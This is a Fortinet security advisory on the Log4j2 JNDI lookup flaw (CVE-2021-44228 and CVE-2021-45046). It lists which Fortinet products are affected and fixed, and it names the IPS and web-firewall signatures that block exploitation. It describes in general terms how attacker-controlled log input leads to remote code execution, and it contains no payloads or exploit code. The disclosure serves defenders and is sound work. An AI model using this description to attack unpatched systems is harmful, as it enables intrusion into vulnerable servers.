PSIRT Advisories

Apache log4j2 log messages substitution (CVE-2021-44228)

Summary

Apache Log4j <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled (CVE-2021-44228).


See the Fortinet Blog for more more detail https://www.fortinet.com/blog/psirt-blogs/apache-log4j-vulnerability

Affected Products

The following products are NOT impacted:


FortiADC
FortiAI
FortiAnalyzer
FortiAP
FortiAP-U
FortiAuthenticator
FotiCache
FortiCarrier
FortiClient (All versions)
FortiClientEMS
FortiConnect
FortiConverter
FortiDDoS
FortiDDoS-F
FortiDeceptor
FortiEDR Agent
FortiExtender
FortiMail
FortiManager
FortiNAC
FortiOS (includes FortiGate & FortiWiFi)
FortiPresence
FortiProxy
FortiRecorder (inlcudes FortiCamera) 
FortiSandbox
FortiSASE
FortiSOAR
FortiSwitch & FortiSwitchManager
FortiTester
FortiToken & FortiToken Mobile
FortiVoice (includes FortiPhone)
FortiWeb
FortiWLC
FortiWLM


FortiAnalyzer Cloud
FortiClient Cloud
FortiExtender Cloud
FortiGate Cloud
FortiGSLB Cloud
FortiLAN Cloud (includes Switch & AP)
FortiManager Cloud
FortiPenTest
FortiPhish Cloud
FortiToken Cloud
FortiWeb Cloud


The following products are impacted and fixes are being worked on. This advisory will be updated as soon as ETAa are available:


FortiAIOps - Fixed in version 1.0.2
FortiAnalyzer BigData - Fixed on 2021-12-10 in 6.4.7 & 7.0.2
FortiCASB - Fixed on 2021-12-10
FortiConverter Portal - Fixed on 2021-12-10
FortiCWP - Fixed on 2021-12-10
FortiEDR Cloud - Not exploitable. Additional precautionary mitigations put in place on 2021-12-10
FortiInsight - Not exploitable. Additional precautionary mitigations being investigated.
FortiIsolator - Fix scheduled for version 2.3.4
FortiMonitor - Mitigations for NCM & Elastiflow available
FortiPortal - Fixed in 6.0.8 and 5.3.8
FortiSIEM - Mitigation available
ShieldX - Fix scheduled for versions 2.1 and 3.0 - ETA 2021/12/17


Update:  CVE-2021-45046 (CVSS score: 3.9 - Low)

It was found by the Apache Software Foundation (ASF) that the fix they released to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout, with either a Context Lookup or a Thread Context Map pattern, to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack


Products marked NOT impacted  remain so.   Additionally the following products are not impacted, or the previous fix includes a fix for CVE-2021-45046:

FortiAIOps
FortiConvertor Portal
FortiEDR Cloud
FortiPortal

Solutions

For full details of protections and detections for the IoCs related to this vulnerability, please see the Log4j2 Vulnerability Outbreak Alert  (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)


IPS Signature protection (FortiOS)

Fortinet have released& IPS signature Apache.Log4j.Error.Log.Remote.Code.Execution, with VID 51006 to address this threat. This signature was initially released in IPS package (version 19.215),. Please note that, since this is an emergency release, the default action for this signature is set to pass. Please modify the action according to your need.
As of IPS DB version 19.217 this signature was set to drop by default.


IPS Signature protection (FortiADC & FortiProxy)

FortiADC supports IPS signature to mitigate  log4j (version 19.215).
FortiProxy supports IPS signature to mitigate log4j (version 19.215).


Web Application Firewall (FortiWeb & FortiWeb Cloud)

Web Application signatures to prevent this vulnerability were first added in database 0.00305 and have been updated in recent releases to add additional coverage

Using FortiAnalyzer to detect activities related to exploits of Apache Log4j2 vulnerability


Last Updated: Tuesday December 15, 8:50 PM Pacific Time